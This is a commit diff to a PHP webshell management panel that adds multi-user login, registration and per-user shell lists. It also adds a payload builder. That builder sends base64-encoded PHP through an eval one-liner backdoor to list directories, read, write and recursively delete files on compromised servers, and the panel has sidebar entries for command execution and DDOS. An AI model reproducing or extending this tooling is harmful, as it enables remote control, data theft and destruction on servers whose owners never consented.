自定义命令 多用户支持

Author: boy-hack

config.php

@@ -11,4 +11,6 @@
 define('DB_PREFIX','w8_');
 
 //WEB一句话分页条数
-define("perpage_num",'2');
+define("perpage_num",'20');
+//修改某个ID为管理员只需要在 w8_user表把admin设置为1即可 ps:管理员好像只能发邀请码 = -
+

content/views/file.php

@@ -1,9 +1,7 @@
 <!-- content start -->
   <div class="admin-content">
     <div class="admin-content-body">
-      <div class="am-cf am-padding am-padding-bottom-0">
-        <div class="am-fl am-cf"><strong class="am-text-primary am-text-lg">Webshell</strong> / <small>文件管理</small></div>
-      </div>
+      <?php echo mianbao("file",$info["id"]); ?>
       <hr>
 		<div class="am-g">
         <div class="am-u-sm-12 am-u-md-4">
@@ -29,15 +27,13 @@
         </div>
         <div class="am-u-sm-12 am-u-md-3">
           <div class="am-form-group">
-            <select data-am-selected="{btnSize: 'sm'}" style="display: none;" onchange="selectSort(this);">
+            <select data-am-selected="{btnSize: 'sm'}" style="display: none;" onchange="location.href='index.php?action=file&gid=<?php echo $info["id"]; ?>&path='+options[selectedIndex].value">
               <option value="<?php echo $rootfile; ?>">本程序目录</option>
               <option value="C:/">C盘</option>
               <option value="D:/">D盘</option>
               <option value="E:/">E盘</option>
               <option value="F:/">F盘</option>
               <option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动">启动项</option>
-              <option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup">启动项(英)</option>
-              <option value="C:/RECYCLER">回收站</option>
               <option value="C:/Program Files">Programs</option>
               <option value="/etc">etc</option>
               <option value="/home">home</option>
@@ -46,11 +42,6 @@
             </select>
           </div>
         </div>
-        <script>
-          function selectSort(type){
-            window.location.href = "index.php?action=file&gid=<?php echo $info["id"]; ?>&path=" + type.value;
-          }
-          </script>
       </div>
       <div class="am-g">
 

content/views/footer.php

@@ -8,6 +8,5 @@
 <script src="<?php echo CSS_Path; ?>assets/js/jquery.min.js"></script>
 <!--<![endif]-->
 <script src="<?php echo CSS_Path; ?>assets/js/amazeui.min.js"></script>
-<script src="<?php echo CSS_Path; ?>assets/js/app.js"></script>
 </body>
 </html>

content/views/header.php

@@ -24,12 +24,12 @@
 
       <li class="am-dropdown" data-am-dropdown>
         <a class="am-dropdown-toggle" data-am-dropdown-toggle href="javascript:;">
-          <span class="am-icon-users"></span> 管理员 <span class="am-icon-caret-down"></span>
+          <span class="am-icon-users"></span> <?php echo $email; ?> <span class="am-icon-caret-down"></span>
         </a>
         <ul class="am-dropdown-content">
           <li><a href="#"><span class="am-icon-user"></span> 资料</a></li>
           <li><a href="#"><span class="am-icon-cog"></span> 设置</a></li>
-          <li><a href="#"><span class="am-icon-power-off"></span> 退出</a></li>
+          <li><a href="index.php?action=logout"><span class="am-icon-power-off"></span> 退出</a></li>
         </ul>
       </li>
       <li class="am-hide-sm-only"><a href="javascript:;" id="admin-fullscreen"><span class="am-icon-arrows-alt"></span> <span class="admin-fullText">开启全屏</span></a></li>
@@ -53,7 +53,7 @@
         </li>
         <li><a href="#"><span class="am-icon-bug"></span> 执行命令</a></li>
         <li><a href="#"><span class="am-icon-bug"></span> DDOS</a></li>
-        <li><a href="#"><span class="am-icon-sign-out"></span> 注销</a></li>
+        <li><a href="index.php?action=logout"><span class="am-icon-sign-out"></span> 注销</a></li>
       </ul>
 
       <div class="am-panel am-panel-default admin-sidebar-panel">

content/views/login.php

@@ -2,7 +2,7 @@
 <html>
 <head lang="en">
   <meta charset="UTF-8">
-  <title>Login Page | w8ay Webshell Manager</title>
+  <title>登陆</title>
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <meta name="format-detection" content="telephone=no">
@@ -34,21 +34,20 @@
 </div>
 <div class="am-g">
   <div class="am-u-lg-6 am-u-md-8 am-u-sm-centered">
-
+  <?php if(isset($tip))echo $tip; ?>
     <form method="post" class="am-form">
       <label for="email">邮箱:</label>
-      <input type="email" name="" id="email" value="">
+      <input type="email" name="email" id="email" value="">
       <br>
       <label for="password">密码:</label>
-      <input type="password" name="" id="password" value="">
+      <input type="password" name="password" id="password" value="">
       <br>
       <label for="remember-me">
-        <input id="remember-me" type="checkbox">
-        记住密码
+      <a href="index.php?action=reg">注册</a>
       </label>
       <br />
       <div class="am-cf">
-        <input type="submit" name="" value=" 登 录 " class="am-btn am-btn-primary am-btn-sm am-fr">
+        <input type="submit" name="submit" value=" 登 录 " class="am-btn am-btn-primary am-btn-sm am-fr">
       </div>
     </form>
     <hr>

content/views/mothod.php

@@ -31,4 +31,17 @@ function File_Size($size)
 	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
 	else $size = $size . ' B';
 	return $size;
+}
+
+function mianbao($action="",$gid="",$filepath='')
+{	
+	echo '<div class="am-cf am-padding am-padding-bottom-0">
+	<div class="am-fl am-cf"><strong class="am-text-primary am-text-lg"><a href="index.php">Webshell</a></strong> /'; 
+	if($action=="file"){
+		echo '<small><a href="index.php?action=file&gid='.$gid.'">文件管理</a></small>';
+		
+	}else{
+		echo '<small>一句话管理</small>';
+	}
+    echo '</div></div>';
 }

content/views/reg.php

@@ -0,0 +1,60 @@
+<!DOCTYPE html>
+<html>
+<head lang="en">
+  <meta charset="UTF-8">
+  <title>注册</title>
+  <meta http-equiv="X-UA-Compatible" content="IE=edge">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <meta name="format-detection" content="telephone=no">
+  <meta name="renderer" content="webkit">
+  <meta http-equiv="Cache-Control" content="no-siteapp" />
+  <link rel="alternate icon" type="image/png" href="<?php echo CSS_Path; ?>assets/i/favicon.png">
+  <link rel="stylesheet" href="<?php echo CSS_Path; ?>assets/css/amazeui.min.css"/>
+  <style>
+    .header {
+      text-align: center;
+    }
+    .header h1 {
+      font-size: 200%;
+      color: #333;
+      margin-top: 30px;
+    }
+    .header p {
+      font-size: 14px;
+    }
+  </style>
+</head>
+<body>
+<div class="header">
+  <div class="am-g">
+    <h1>注册</h1>
+    <p>Webshell 一句话管理平台</p>
+  </div>
+  <hr />
+</div>
+<div class="am-g">
+  <div class="am-u-lg-6 am-u-md-8 am-u-sm-centered">
+      <?php if(isset($tip))echo $tip; ?>
+    <form method="post" class="am-form">
+      <label for="email">邮箱:</label>
+      <input type="email" name="email" id="email" value="">
+      <br>
+      <label for="password">密码:</label>
+      <input type="password" name="password" id="password" value="">
+      <label for="password">邀请码</label>
+      <input type="text" name="invitcode" id="text" value="暂未开启，随意填写">
+      <br>
+      <label for="remember-me">
+      <a href="index.php?action=login">登陆</a>
+      </label>
+      <br />
+      <div class="am-cf">
+        <input type="submit" name="submit" value=" 注 册 " class="am-btn am-btn-primary am-btn-sm am-fr">
+      </div>
+    </form>
+    <hr>
+   
+  </div>
+</div>
+</body>
+</html>

content/views/webshell.php

@@ -1,9 +1,7 @@
   <!-- content start -->
   <div class="admin-content">
     <div class="admin-content-body">
-      <div class="am-cf am-padding am-padding-bottom-0">
-        <div class="am-fl am-cf"><strong class="am-text-primary am-text-lg">Webshell</strong> / <small>一句话管理</small></div>
-      </div>
+      <?php echo mianbao(); ?>
 
       <hr>
           <div class="am-g">

include/controller/Login_Controller.php

@@ -4,9 +4,54 @@
 */
 class Login_Controller
 {
+
 	public function Display()
 	{
+		$User_model = new User_model();
+		if(isset($_POST["submit"])){
+			$email = $_POST["email"];
+			$password = $_POST["password"];
+			$password = md5($password);
+			$uid = $User_model->CheckUser($email,$password);
+			if($uid){
+				$_SESSION["uid"] = $uid["id"];
+				$_SESSION["email"] = $uid["email"];
+				$_SESSION["admin"] = $uid["admin"];
+				Direct("index.php");
+			}else{
+				$tip = "登陆失败！";
+			}
+		}
 		require_once(View::getView('login'));
 		die();
 	}
+
+	public function DisplayReg()
+	{
+		$User_model = new User_model();
+		if(isset($_POST["submit"])){
+			$email = $_POST["email"];
+			$password = $_POST["password"];
+			$password = md5($password);
+			
+			$tip = "";
+			if($User_model->isExist($email)){
+				$tip = "注册失败！";
+			}else{
+				$User_model->addUser($password,$email,0);
+				$tip = "注册成功！";
+			}
+
+		}
+		require_once(View::getView('reg'));
+		die();
+	}
+
+	public function Logout()
+	{
+		unset($_SESSION["uid"]);
+		unset($_SESSION["email"]);
+		unset($_SESSION["admin"]);
+		Direct("index.php");
+	}
 }

include/controller/ShellFile_Controller.php

@@ -20,7 +20,7 @@ public function Display_index($gid,$filepath='')
 			if(isset($webroot)){
 				$rootfile = $webroot["WebRoot"];
 				$webfile = FileSort($Shell_Model->GetWebDiskFileList($rootfile));
-				include View::getView('file');
+				//include View::getView('file');
 			}else{
 				wmsg("连接失败");
 			}

include/controller/Shellog_Controller.php

@@ -15,10 +15,11 @@ function display_index(){
 		$page = $_GET["page"];
 		if(empty($page))$page=1;
 		$index_lognum = perpage_num;
+		$author = "and uid=".UID;
 		if(isset($keyword)){
 			$keyword = addslashes(htmlspecialchars(urldecode($keyword)));
 			$keyword = str_replace(array('%', '_'), array('\%', '\_'), $keyword);
-			$sqlSegment = "where extra like '%{$keyword}%' or url like '%{$keyword}%' order by time desc";
+			$sqlSegment = "where extra like '%{$keyword}%' or url like '%{$keyword}%' $author order by time desc";
 			$lognum = $Webshell_Model->getLogNum($sqlSegment);
 			$total_pages = ceil($lognum / $index_lognum);
 			if ($page > $total_pages) {
@@ -30,7 +31,7 @@ function display_index(){
 		}elseif (isset($type)) {
 			$type = strtoupper(addslashes(htmlspecialchars(urldecode($type))));
 			$type = str_replace(array('%', '_'), array('\%', '\_'), $type);
-			$sqlSegment = "where type = '$type' order by time desc";
+			$sqlSegment = "where type = '$type' $author order by time desc";
 			$lognum = $Webshell_Model->getLogNum($sqlSegment);
 			$total_pages = ceil($lognum / $index_lognum);
 			if ($page > $total_pages) {
@@ -40,13 +41,14 @@ function display_index(){
 			$logs = $Webshell_Model->getLogsForAdmin($sqlSegment,$page);
 			$page_url = pagination($lognum, $index_lognum, $page, $pageurl);
 		}else{
+			$sqlSegment = 'where uid='.UID;
 			$lognum = $Webshell_Model->getLogNum($sqlSegment);
 			$total_pages = ceil($lognum / $index_lognum);
 			if ($page > $total_pages) {
 			    $page = $total_pages;
 			}
 			$pageurl = 'index.php?&page=';
-			$logs = $Webshell_Model->getLogsForAdmin('',$page);
+			$logs = $Webshell_Model->getLogsForAdmin($sqlSegment,$page);
 			$page_url = pagination($lognum, $index_lognum, $page, $pageurl);
 		}
 		require_once(View::getView('webshell'));
@@ -60,6 +62,7 @@ function display_add(){
 				$_POST["options"] = "ASP";
 			}
 			$logData = array(
+					"uid" => UID,
 					"url" => htmlspecialchars($_POST["add_url"]),
 					"pass" => htmlspecialchars($_POST["add_password"]),
 					"extra" => htmlspecialchars($_POST["add_intro"]),

include/model/PHPShell_Build_model.php

@@ -0,0 +1,72 @@
+<?php 
+/**
+* PHP 一句话payload生成
+*/
+class PHPShell_Build_Model
+{
+	var $phpshell = array(
+		'link' => '{PASS}=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=',//连接前缀
+
+		'safe' => "@ini_set('display_errors','0');@set_time_limit(0);@set_magic_quotes_runtime(0);",//payload前缀
+
+		'flag_left' => 'echo("->|");',//左标志位
+
+		'flag_right' => 'echo("|<-");die();',//右标志位
+
+		'GetWebRoot' => '$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D==""){$D=dirname($_SERVER["PATH_TRANSLATED"]);}$arr = array("WebRoot" => $D);echo json_encode($arr);',//获取一句话目录
+		
+		'GetWebDiskFileList' => '$D=base64_decode($_POST["z1"]);$F=opendir($D);
+if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$tmparr = array();	while($N=readdir($F)){$P=$D."/".$N;$T=date("Y-m-d H:i:s",filemtime($P));$E=substr(base_convert(fileperms($P),10,8),-4);$arr = array("time" => $T, "size" => filesize($P),"root" => $E,"path" =>urlencode(is_dir($P)?$N."/":$N));$tmparr[] = $arr;}echo json_encode($tmparr);closedir($F);};',//获取磁盘文件
+		
+		'GetWebFileContent' => '$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);',//得到文件内容
+
+		'CreateAndSaveFile' => 'echo @fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";',//创建文件
+
+		'DeleteFile' => 'function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}',//删除文件
+		);
+
+	public function Conbinationx($value='')//组合payload
+	{
+		return $this->phpshell["safe"].$this->phpshell["flag_left"].$value.$this->phpshell["flag_right"];
+	}
+
+	public function GetWebRootPath()//取一句话目录
+	{
+		$payload = $this->Conbinationx($this->phpshell["GetWebRoot"]);
+		$payload = urlencode(base64_encode($payload));
+		$payload = $this->phpshell["link"].$payload;
+		return $payload;
+	}
+
+	public function GetWebDiskFileList()//取磁盘文件
+	{
+		$payload = $this->Conbinationx($this->phpshell["GetWebDiskFileList"]);
+		$payload = urlencode(base64_encode($payload));
+		$payload = $this->phpshell["link"].$payload.'&z1={PATH}';
+		return $payload;
+	}
+
+	public function GetWebFileContent()//取文件内容
+	{
+		$payload = $this->Conbinationx($this->phpshell["GetWebFileContent"]);
+		$payload = urlencode(base64_encode($payload));
+		$payload = $this->phpshell["link"].$payload.'&z1={PATH}';
+		return $payload;
+	}
+
+	public function CreateAndSaveFile()
+	{
+		$payload = $this->Conbinationx($this->phpshell["CreateAndSaveFile"]);
+		$payload = urlencode(base64_encode($payload));
+		$payload = $this->phpshell["link"].$payload.'&z1={PATH}&z2={Content}';
+		return $payload;
+	}
+
+	public function DeleteFile()
+	{
+		$payload = $this->Conbinationx($this->phpshell["DeleteFile"]);
+		$payload = urlencode(base64_encode($payload));
+		$payload = $this->phpshell["link"].$payload.'&z1={PATH}';
+		return $payload;
+	}
+}